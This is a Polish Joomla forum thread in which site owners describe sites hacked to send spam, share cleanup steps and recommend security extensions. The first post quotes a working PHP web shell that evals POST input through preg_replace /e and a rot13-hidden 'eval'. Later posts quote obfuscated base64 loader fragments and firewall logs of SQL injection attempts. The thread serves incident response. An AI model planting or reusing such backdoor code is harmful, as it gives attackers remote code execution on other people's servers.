PDA

Zobacz pełną wersję : Nadpisywane pliki php - wirusy ?



Father23
22-12-2015, 21:30
Słuchajcie, od jakiegoś czasu mam problem ze stronami postawionymi na Joomli - a działam na niej ponad 3 lata.

Na początku września administartor hostongu zgłosił mi informację że plik o nazwie user84.php zagnieżdżony w randomowym folderu wysyła spam.
Plik oraz inne podejrzane (te które pojawiły się między datą aktualizacji a datą wykrycia ataku) pliki usunąłem.

Teraz sytauacja pojawiła się znowu, znów pojawił się plik tym razem user42.php w innej witrynie którą mam na Joomli, na zupełnie innym szablonie.

Pytanie 1, czy po ręcznym usunięciu plików, mogę zainstalować jakiś płatny component (np. RSFirewall) który będzie pilnował porządku, względnie informował o jakichś podejrzanych akcjach?

Pytanie 2, czy udsotępnianie edytor JCE - osobom które uzupełniają treść strony jest dobrym pomysłem? Na tej pierwszej stronie, spotkałem się z sytacją że były wgrywane całe pliki z worda, to chyba słaby pomysł?

Pliki z dziwnymi nadpisaniami (nazywają się np.:sort-47.php albo backup-90.php albo aJnkurDn.php porozrzucane po całym serwisie)

Przykładowa treść:
<?php if($_GET['test']){echo 'success';}else{($www= $_POST['f6q46']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}

albo:
<?php $GLOBALS['ve03'] = "\x2b\x42\x7b\x52\x5a\x6d\x76\x2a\x79\x74\x4f\xd\x2 8\x31\x26\x51\x50\x2d\x46\x21\x54\x60\x45\x55\x36\ x7a\x5d\x37\x72\x4c\x23\x4e\x22\x5e\x34\x2f\x6e\x7 5\x59\x44\x9\x53\x61\x39\x41\x3d\x77\x3b\x43\x56\x 24\x5f\x4d\x6b\x38\x2c\x3a\x40\x6f\x3e\x7d\x6c\x68 \xa\x70\x5c\x5b\x47\x30\x27\x7c\x67\x33\x63\x29\x6 2\x65\x20\x4b\x3f\x57\x35\x2e\x71\x48\x6a\x78\x25\ x58\x69\x32\x66\x4a\x7e\x3c\x64\x73\x49";
$GLOBALS[$GLOBALS['ve03'][95].$GLOBALS['ve03'][43].$GLOBALS['ve03'][34].$GLOBALS['ve03'][72].$GLOBALS['ve03'][54].$GLOBALS['ve03'][81].$GLOBALS['ve03'][42]] = $GLOBALS['ve03'][73].$GLOBALS['ve03'][62].$GLOBALS['ve03'][28];



Zaobserowałem ostatnio nasilenie takich akcji, czy ktoś ma na to receptę?

maccoo
23-12-2015, 00:52
Na jakim hostingu masz serwis? Teraz własnie czyszczę stronę z obcych plików. Serwis postawiony na jakimś mało znanym hostingu (linux coś tam), joomla aktalizowana regularnia, dodatków prawie nie ma, działa admin tools który nic nie wykrył. Serwis rozsyłal spam ale przy czyszczeniu odkryłem jeszcze inny rodzaj infekcji. Dziura moze być po stronie serwera
Pobierz serwis na dysk i przeskanuj, mogą tam się znaleźć pliki których nie podglądniesz

grześko
23-12-2015, 02:01
@Father23

ad. pytanie1: nie ta kolejność.
Moim zdaniem właściwa kolejność to:
1. znaleźć dziurę
2. załatać dziurę
3. oczyścić Joomlę
4. zainstalować ochronę

Co do ochrony - sam korzystam z Admin Tools Pro, on ma w opcjach ochrony skaner zmian w plikach m.in. PHP.
Jest to ciekawa opcja, ale wymaga pewnej dyscypliny - włączenie ma sens na "zdrowej" witrynie, należy wykonywać regularnie, należy wykonać po każdej aktualizacji/instalacji core lub dodatku.
Ewidentnie masz wirusa i należy zacząć od znalezienia dziury.

pawciok1989
23-12-2015, 11:34
Maccoo o hostingu, którym piszesz to linuxpl.com. Od wczoraj blokują mi stronę, bo ich antywirus coś wykrył. Napisali, że moja strona rozsyła spam. Joomla zaktualizowana do najnowszej wersji, dodatki również (aktualizacje, które się pokazały to zainstalowałem). Na koncie pojawiają się jakieś dziwne pliki z zakodowaną treścią i po ich usunięciu, odblokowali stronę. Tylko ile razy tak można.

Bazyl
23-12-2015, 11:38
Po prostu trzeba należycie wykonać robotę :-)

http://www.joomla.pl/o-joomla/joomla-w-praktyce/mam-witryne-w-joomla/postepowanie-po-wlamaniu

grześko
23-12-2015, 12:01
Linuxpl.com to nie znowu taki mało znany hosting. Korzystam od lat i raczej jestem zadowolony, także z supportu, który kiedyś znacząco mi pomógł po włamie na Joomlę.

@pawciok1989:

aktualizacje, które się pokazały to zainstalowałem
Wszędzie sprawdzałeś? Niektóre dodatki pokazują, że wymagają aktualizacji dopiero gdy w zapleczu wejdziesz na zarządzanie nim.
Ja miałem kiedyś włam przez dodatek, który... nigdzie nie pokazywał, że wymaga aktualizacji. Po prostu zakończyło się pewnego dnia rozwijanie go i tyle... A nie wpadłem na to, żeby sprawdzać także na stronie autora.
Jeśli nie pozbędziesz się dziury - to te pliki będą pojawiać się znowu.

pawciok1989
23-12-2015, 15:44
Też korzystam z ich usług prywatnie i komercyjnie. Na razie co mogłem to zaktualizowałem. Niektóre dodatki faktycznie nie miały u producenta od dłuższego czasu aktualizacji. Jednak nie mogłem znaleźć czegoś podobnego z takimi funkcjami. Analizuję również logi, ale to dosyć mozolne szukanie. Odinstalowałem zbędne szablony i dodatki, więc pole zawęża się.

Gall Anonim
23-12-2015, 18:00
@pawciok1989
linuxpl.com - jest doskonałym dostwcą usługi o bardzo dużej elastyczności konfiguracji
Korzystam z ich usług od lat - więc odrobinę doświadczenia mam - przez jakiś czas testowałem ich równolegle z posiadaniem usługi na nazwa.pl - kiedyś miałem coś na home.pl, był epizod z hekko i z czymś tam jeszcze - linuxpl.com w moim odczuciu wygrywa.
Co do problemów które masz i tyi kolega - pomyśl czemu w przeciągu kilku ostatnich dni poszły aż trzy aktualiacje Joomla, pięć aktualizacji RS Firewalla, jak również AdminTools był aktualizowany. Został wymyślony przez "wesołą ekipę" sposób na wtrzyknięcie kodu i efektywnie wykorzystany przy pisaniu botów. W ostatnich paru dniach sypnęło się mnustwo witryn - zwłaszcza te pomiędzy Joomla 3.1.2 a 3.4.1. Joomla 1.5.26 została praktycznie nietknięta w tym czasie (albo nie dotarły do mnie zgłoszenia). Ogólnie niektóre niezaktualizowane witryny z niekatualizowaną Joomla jak i rozszerzeniami miały tak dużą ilość wstrzykniętych plików że można to było nazwać "wysypką". Przy okazji zaczełey korzystając z prox'y wysyłać dziką ilość wiadomości. Na chwilę obecną sytuacja wygląda na ogarniętą ale na samych aktualizacjach w ostatnim tygodniu miałem urwanie głowy - aczkolwiek nie sypneła mi się żadna witryna - chociaż nie powiem - wpadło nie mało dodatkowych grajcarów na święta za "leczenie".
Więc akurat ja nie mam na co narzekać :-)

pawciok1989
23-12-2015, 20:08
@Gall Anonim
Właśnie pisałem do linuxpl.com, żeby przeskanowali moje konto i wyszło, że na razie pusto. Jednak zastanawiam się czy jutro z jakiegoś miejsca nie zreplikuje się mi ponownie. Ogólnie gdyby nie hostingodawca to bym nie wiedział, że spamer siedzi u mnie na koncie, ponieważ witryna funkcjonuje jak zwykle, to po stronie serwera wyszło, że jest za duży ruch i idzie podejrzana wysyłka. Na szczęście nie podmienia plików, tylko tworzy swoje. Poniżej lokalizacje gdzie się zagnieździł i skąd usunąłem:

administrator/components/com_banners/views/lib11.php

plugins/system/sef/file.php

administrator/components/com_phocagallery/libraries/javascript.php

modules/mod_zoominfo/elements/object30.php

i na deser:

siedział w katalogu tmp również plik php. Nie pamiętam nazwy, ale go usunąłem. I tego pliku z katalogu tmp antywirus hostingodawcy nie widział.

Zastanawiam się czy to ten plik z tmp rozsiewał czy muszę dalej szukać?

Gall Anonim
23-12-2015, 21:09
Nie korzystam z softu hostingodawcy bo nie jest wyprofilowany na tego typ skrypty tylko na ochronę serwera i tak jest na każdym hoście - jeśli już niech podadzą logi - te pliki które przedstawiłeś nie są samotne - na 95% masz dopiski w plikach rdzenia - jeszcze jedno - bezkrytyczne usuwanie plików wskazanych jako zawirusowane jest kiepskim pomysłem ponieważ z rozpędu możesz usunąć rdzenny.
Na deser - ściągnij sobie na komputer katalog images i przeszukaj pod kontem plików php :-)
Ponieważ nie wiem jakich rozszerzeń używasz do zabezpieczeń i sprawdzania "niespodzianek" skorzystaj z https://myjoomla.com/

pawciok1989
23-12-2015, 21:55
Miałeś rację w katalogu images były pliki option.php i start.php. W ten sposób mogę wyselekcjonować porównując w stosunku do kopii lokalnej. Gorzej jak jest właśnie dopisek w samym pliku, wtedy już tego nie wychwycę. Spróbuję poleconego przez Ciebie narzędzia.

pawciok1989
24-12-2015, 11:01
Nie wiem co teraz robić. Przez cały dzień po usunięciu plików jest niby czysto. Nawet wysyłałem e-maila aby przeskanowali konto. Po nocy dostaję informacje od hostingodawcy, że znów mi zablokował mi stronę. Podejrzewam, że to cały czas siedzi.

kawałek kodu z pliku option.php

<?php
$tqv3 ="_ueporst"; $emc70=$tqv3[6].$tqv3[7].$tqv3[5].


Dzisiaj kolejne dwa pliki np. inc59.php i test.php

<?php
function nuwvctdgo($ad, $ijbe){$vptcl = ''; for($i=0; $i < strlen($ad); $i++){$vptcl .= isset($ijbe[$ad[$i]]) ? $ijbe[$ad[$i]] : $ad[$i];}
$jfadypl="base64_decode";return $jfadypl

....

$gnhf = '4VDKraORhU49pTaACJOAUTlohAC6tw1ai

(tu kilkadziesiąt linii)

$inq = Array('1'=>'5', '0'=>'L', '3'=>'q', '2'=>'1', '5'=>'B', '4'=>'Q', '7'=>'h', '6'=>'s', '9'=>'o',


Dla mnie wygląda to na atak brute force.

Nie wiem czy odinstalować wszystkie moduły, komponenty itd. Czy przywrócić kopię z przed miesiąca. Wówczas ponownie zaktualizuję Joomla, ale nadal nie będę wiedział, czy jakimś dodatkiem nie wchodzi....

Bazyl
24-12-2015, 13:25
Możesz jeszcze przez rok tak działać ;-)



Po prostu trzeba należycie wykonać robotę :-)

http://www.joomla.pl/o-joomla/joomla...ie-po-wlamaniu

pawciok1989
24-12-2015, 14:18
Wiem, że to grzebanie nie napiszę w czym. Tylko chcę wybrać najlepsze rozwiązanie. Mam kopię z przed miesiąca. Jeżeli na nią podmienię cały serwis to i tak nie da mi to odpowiedzi co było przyczyną. Jeżeli to kwestia dodatku to i tak ponownie to wejdzie. Skanuję różnymi zabawkami i wychodzi, że czysto. Pewnie korzysta z jakieś luki i wysyła porcję o danej godzinie. Hostingowy antywirus wykrywa zarażone pliki jako: php.base64.v23au.185

Gall Anonim
24-12-2015, 15:47
Jak masz zasoby finansowe to:
na wzorce kodu złośliwego skanuje między innymi RS Firewall - obecnie mają rabat świąteczny = jak dla mnie dobra inwestycja - wskaże pliki ze znanym kodem złośliwym i nadpisane rdzenne z wszczepionym. Rdzenne możesz nadpisać oryginalnymi plikami konkretnej wersji instalacyjnej, wskazane po za rdzeniem należy sprawdzić i albo usunąć jeżeli to "przybłędy" albo podmienić na oryginalne z instalacji rozszerzeń lub o ile potrafisz - wypreparować kod złośliwy i usunąć.
Jest jeszcze kilka innych działań sprawdzających ale akurat te przy ostatnich atakach powinny wystarczyć.
Pzdr
P.S. Niestety w przypadku ostatnich ataków część z nich aktywowała się z dużym opóźnieniem i kopia z przed miesiąca nie gwarantuje czystości - ją również musisz sprawdzić.
P.S.II To nie jest atak typu brute force :-) Brut force to miałem wtedy kiedy mi walnęło ponad 80 tysięcy zapytań w dwie godziny :-)

pawciok1989
24-12-2015, 16:24
To szczerze pisząc to chyba w tym momencie nie ma znaczenia czy ma się kopię zapasową czy nie, bo jest ten sam punkt wyjścia. Nie wiem czy w bazie danych też coś nie siedzi. Jeżeli baza jest zarażona to postawienie nawet czystej Joomla też nić nie da. Jeżeli RSFirewall wykonałby to co napisałeś to byłoby jakieś rozwiązanie.

Jeszcze poniżej zamieszczam informację systemową z serwera:

The nazwamojegokonta account has just finished sending 4000 emails.
There could be a spammer, the account could be compromised, or just sending more emails than usual.

After some processing of the /etc/virtual/usage/nazwamojegokonta.bytes file, it was found that the highest sender was flora_garza@tunazwamojejdomeny.pl, at 310 emails.



The most common path that the messages were sent from is /root, at 12924 emails (323%).
The path value may only be of use if it's pointing to that of a User's home directory.
If the path is a system path, it likely means the email was sent through smtp rather than using a script.

This warning was generated because the 4000 email threshold was hit.


Z tego wynika, że pod moją domeną stworzył jakieś konto e-mail, tylko go nie widać. Chyba, że tylko jakiś zakodowany alias. Ale widać, że "porządnie" spamuje.

pawciok1989
26-12-2015, 13:57
Sytuacja na dzisiaj została uspokojona, ale nie wiem czy wyleczona.

1. Usunąłem obce pliki, które zostały dodane do katalogów Joomla. (Bardzo dużo pomogło oprogramowanie Awstats. Dzięki jego logom mogłem dotrzeć do plików, które zostały dodane).
2. Jak wspominał @Gall Anonim, kod był również dopisany do plików rdzeni. Taki plik znalazłem jeden. Obcy kod był dodany na początku kodu pliku.
3. Zainstalowałem kilka dodatków:
- dodatek Spadaj,
- Securitycheck
- Wypier.php, który również pomógł szukać dodanych plików.

4. Zmieniłem wszystkie hasła
- do katalogu administrator
- do panelu administratora
- panelu admina i FTP na hostingu
- do bazy danych




Bazując na artykule: http://www.slawop.net/blog/wazne-poprawki-bezpieczenstwa-joomla-3-4-5 , obstawiam, że wirus wszedł przez niezaktualizowaną na czas Joomla.

Mimo, że w początkowej fazie walki szybko zaktualizowałem Joomla, to siłą rzeczy nic to nie dało, bo wirus już był.


Według mnie zagnieździł się początkowo w com_content a później to już rozsiewał się.


Aktualnie program Securitycheck w logach pokazuje, że nadal coś chce się wbić.

Securitycheck | Logi Web Firewall

Ip Czas Opis URL Komponent Rodzaj
207.234.209.65 2015-12-26 11:16:31 Backslashes added to characters :[POST: P1] /tmp/F1bE3.php com_content SQL Injection

207.234.209.65 2015-12-26 11:16:31 Komentarze :[POST: P1] /tmp/F1bE3.php com_content SQL Injection

50.63.194.31 2015-12-26 08:48:53 Backslashes added to characters :[POST: P1] /tmp/F1bE3.php com_content SQL Injection

50.63.194.31 2015-12-26 08:48:53 Liczby (0x format) :[POST: P1] /tmp/F1bE3.php com_content SQL Injection

23.234.37.3 2015-12-26 05:17:11 Backslashes added to characters :[POST: P1] /tmp/F1bE3.php com_content SQL Injection

50.23.210.133 2015-12-25 13:03:45 Usunięto tagi z ciągu (możliwy atak XSS) :[POST:data] /libraries/joomla/event/error.php com_content XSS (Cross-site scripting)

50.23.210.133 2015-12-25 13:03:42 Usunięto tagi z ciągu (możliwy atak XSS) :[POST:data] /libraries/legacy/web/lib.php com_content XSS (Cross-site scripting)


Od wczoraj otrzymuję informację od hostingodawcy, że ich antywirus nie wykrywa już zagrożenia.


Czy te logi oznaczają, że wirus chce się wbić nadal do com_content?
Czy te komunikaty oznaczają, że dodatek sobie radzi z zagrożeniem?

paocek
21-04-2016, 12:15
U mnie sprawa wyglądała podobnie, to co zrobiłem to:
1. zmiany haseł do zaplecza i ftp'a
2. wgranie .htaccess do folderu administrator ograniczające logowanie do zaplecza tylko z jednego IP (mogę sobie na to pozwolić)
3. usunięcie PHP/PhpShell.NBD koń trojański wykrytego przez eset online scaner, 4 pliki:
\administrator\components\com_banners\views\banner \tmpl\backup-8b8.php PHP/PhpShell.NBD koń trojański wyleczony przez usunięcie
\administrator\components\com_newsfeeds\models\fie lds\modal\cache-78c.php PHP/PhpShell.NBD koń trojański wyleczony przez usunięcie
\attachments\modphp.php PHP/PhpShell.NBD koń trojański wyleczony przez usunięcie
\pliki\modphp.php PHP/PhpShell.NBD koń trojański wyleczony przez usunięcie
4. Wyszukanie plików ze słowem "eval" , "payload" i skasowanie ich lub usunięcię złośliwego kodu - w moim przypadku wpisany na początku, łatwy do odróżnienia od "joomlowego" kodu
5. Usunięcie pliku index.php z folderu templatek ze znajomym kodem: <script>var a='';setTimeout(10)....

Pewnie łatwiej i pewniej odtworzyć stronę z kopii zapasowej, lecz powyższe wskazówki są dla tych którzy takowej nie posiadają. Jeśli ktoś zna jeszcze miejsca które zostały zainfekowane niech dopisuje pod tym postem, skala zjawiska sądząc po ilości stron w internecie jest spora, a nie każdy może odtworzyć stronę z backupu

dumes
21-04-2016, 22:30
U mnie sprawa wyglądała podobnie, to co zrobiłem to:
1. zmiany haseł do zaplecza i ftp'a
2. wgranie .htaccess do folderu administrator ograniczające logowanie do zaplecza tylko z jednego IP (mogę sobie na to pozwolić)
3. usunięcie PHP/PhpShell.NBD koń trojański wykrytego przez eset online scaner, 4 pliki:
\administrator\components\com_banners\views\banner \tmpl\backup-8b8.php PHP/PhpShell.NBD koń trojański wyleczony przez usunięcie
\administrator\components\com_newsfeeds\models\fie lds\modal\cache-78c.php PHP/PhpShell.NBD koń trojański wyleczony przez usunięcie
\attachments\modphp.php PHP/PhpShell.NBD koń trojański wyleczony przez usunięcie
\pliki\modphp.php PHP/PhpShell.NBD koń trojański wyleczony przez usunięcie
4. Wyszukanie plików ze słowem "eval" , "payload" i skasowanie ich lub usunięcię złośliwego kodu - w moim przypadku wpisany na początku, łatwy do odróżnienia od "joomlowego" kodu
5. Usunięcie pliku index.php z folderu templatek ze znajomym kodem: <script>var a='';setTimeout(10)....

Pewnie łatwiej i pewniej odtworzyć stronę z kopii zapasowej, lecz powyższe wskazówki są dla tych którzy takowej nie posiadają. Jeśli ktoś zna jeszcze miejsca które zostały zainfekowane niech dopisuje pod tym postem, skala zjawiska sądząc po ilości stron w internecie jest spora, a nie każdy może odtworzyć stronę z backupu

Nie ma konkretnego schematu, w których plikach większości jest zapisywany szkodliwy kod.
Tutaj jest niezbędna analiza każdego pliku. Nadpisanie czystymi plikami z joomli a reszta do analizy.
Następnie wg. wskazówek zabezpieczeń które są umieszczone na stronie joomla.
Większość osób na forum (szczególnie nowych) denerwuje się że nikt nie pomaga tylko odsyła do http://www.joomla.pl/o-joomla/joomla-w-praktyce/mam-witryne-w-joomla/postepowanie-po-wlamaniu
Ktoś oczekuje gotowca a tak się nie da. Każda strona jest inna, inna infekcja, w różnych miejscach może być syf, to nie 2-3 lata temu gdzie były opisywane infekcje i tylko w konkretnych miejscach dopisywany był złośliwy kod, nie raz idzie teraz losowo aby trudniej było na odnalezienie syfu i jego usunięcie.
Jeśli ktoś nie ma funduszy na zlecenie analizy, naprawę i wprowadzeniu odpowiednich zabezpieczeń to musi najpierw poczytać dokładnie całą procedurę http://www.joomla.pl/o-joomla/joomla-w-praktyce/mam-witryne-w-joomla/postepowanie-po-wlamaniu
Jeśli jest to dla niego niezrozumiałe (a nie raz to się zdarza i później pretensja że czytałem czytałem i dalej to samo) najwidoczniej czytałeś i nie jest to dla ciebie, nie kumasz tego to nie powinienes się tym zajmować.
Na forum nie da się wszystkiego wytłumaczyć a jeśłi nie rozumiesz na tyle aby to naprawić samemu to zleć to komuś kto się na tym zna, zęby zjadł.

Jak samochodu ktoś nie potrafi naprawić to dalej próbuje??? w końcu zleca to innej osobie i na tym się kończy sprawa.
Pewnych rzeczy się można nauczyć z różnych samouczków ale nie jest to dla każdego bo nie każdy to łapie.

paocek
22-04-2016, 12:28
Nie ma konkretnego schematu, w których plikach większości jest zapisywany szkodliwy kod.
Tutaj jest niezbędna analiza każdego pliku. Nadpisanie czystymi plikami z joomli a reszta do analizy.
Następnie wg. wskazówek zabezpieczeń które są umieszczone na stronie joomla.
Większość osób na forum (szczególnie nowych) denerwuje się że nikt nie pomaga tylko odsyła do http://www.joomla.pl/o-joomla/joomla-w-praktyce/mam-witryne-w-joomla/postepowanie-po-wlamaniu
Ktoś oczekuje gotowca a tak się nie da. Każda strona jest inna, inna infekcja, w różnych miejscach może być syf, to nie 2-3 lata temu gdzie były opisywane infekcje i tylko w konkretnych miejscach dopisywany był złośliwy kod, nie raz idzie teraz losowo aby trudniej było na odnalezienie syfu i jego usunięcie.
Jeśli ktoś nie ma funduszy na zlecenie analizy, naprawę i wprowadzeniu odpowiednich zabezpieczeń to musi najpierw poczytać dokładnie całą procedurę http://www.joomla.pl/o-joomla/joomla-w-praktyce/mam-witryne-w-joomla/postepowanie-po-wlamaniu
Jeśli jest to dla niego niezrozumiałe (a nie raz to się zdarza i później pretensja że czytałem czytałem i dalej to samo) najwidoczniej czytałeś i nie jest to dla ciebie, nie kumasz tego to nie powinienes się tym zajmować.
Na forum nie da się wszystkiego wytłumaczyć a jeśłi nie rozumiesz na tyle aby to naprawić samemu to zleć to komuś kto się na tym zna, zęby zjadł.

Jak samochodu ktoś nie potrafi naprawić to dalej próbuje??? w końcu zleca to innej osobie i na tym się kończy sprawa.
Pewnych rzeczy się można nauczyć z różnych samouczków ale nie jest to dla każdego bo nie każdy to łapie.


Nie ma konkretnego schematu i zgadzam się z przedmówcą, naprawić samemu jak się potrafi, a jak nie to zlecić firmie. I nie chce tu polemizować
Ale jeśli moje wskazówki się komuś przydadzą to cieszę się że komuś pomogłem - zastrzegam, że nie podaję gotowca który w 100% rozwiązuje problem, bo jest zbyt wiele kombinacji tej infekcji.